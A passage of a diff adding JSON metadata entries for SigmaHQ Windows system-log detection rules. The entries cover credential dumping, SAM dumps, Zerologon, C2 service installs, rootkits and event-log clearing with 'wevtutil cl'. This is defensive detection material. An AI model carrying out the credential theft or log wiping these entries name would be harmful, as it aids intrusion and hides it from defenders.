category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "meta": { + "author": "Sittikorn S, Tim Shelton", + "creation_date": "2022/05/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_krbrelayup_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation" + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_lpe_indicators_tabtip.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/antonioCoco/JuicyPotatoNG", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": 
"bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "value": "Local Privilege Escalation Indicator TabTip" + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "filename": "win_system_lsasrv_ntlmv1.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ] + }, + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_system_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by 
detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System" + }, + { + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/11", + "falsepositive": [ + "Unlikely" + ], + "filename": 
"win_system_ntfs_vuln_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ] + }, + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation" + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_pcap_drivers.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers" + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "meta": { + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": "No established falsepositives", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "level": "critical", + "logsource.category": "No established category", + 
"logsource.product": "windows", + "refs": [ + "https://www.secura.com/blog/zero-logon", + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ] + }, + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "value": "PowerShell Scripts Installed as Services" + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History" + }, + { + "description": "Detects rare 
service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/08", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_system_rare_service_installs.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations" + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "meta": { + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "creation_date": "2019/05/24", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708" + }, + { + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "filename": "win_system_service_install_anydesk.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_hacktools.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution" + }, + { + "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_mesh_agent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation" + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_netsupport_manager.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install" + }, + { + "description": "Detects PAExec service installation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_paexec.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation" + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side" + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_psexec.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "value": "PsExec Service Installation" + }, + { + "description": "Detects Remote Utilities Host service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_remote_utilities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", + "value": "Remote Utilities Host Service Install" + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants 
execute the PsExec commands", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_sliver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation" + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path" + }, + { + "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_tacticalrmm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation" + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL" + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "meta": { + "author": "Dimitrios Slamaris, @atc_project (fix)", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_system_susp_dhcp_config_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL" + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/05/17", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared" + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": 
"win_system_susp_proceshacker.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation" + }, + { + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_rtcore64_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation" + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_sam_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": 
"839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData" + }, + { + "description": "Detects suspicious service installation commands", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation" + }, + { + "description": "Detects service installation in suspicious folder appdata", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": "Service Installation in Suspicious Folder" + }, + { + "description": "Detects service installation with suspicious folder patterns", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder_pattern.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "value": "Service Installation with Suspicious Folder Pattern" + }, + { + "description": "Detects suspicious service installation scripts", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_script.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script" + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_system_update_error.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ] + }, + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error" + }, + { + "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. 
Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "meta": { + "author": "Cybex", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "system", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System" + }, + { + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_system_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation" + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts (backups maybe)." + ], + "filename": "win_system_volume_shadow_copy_mount.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": 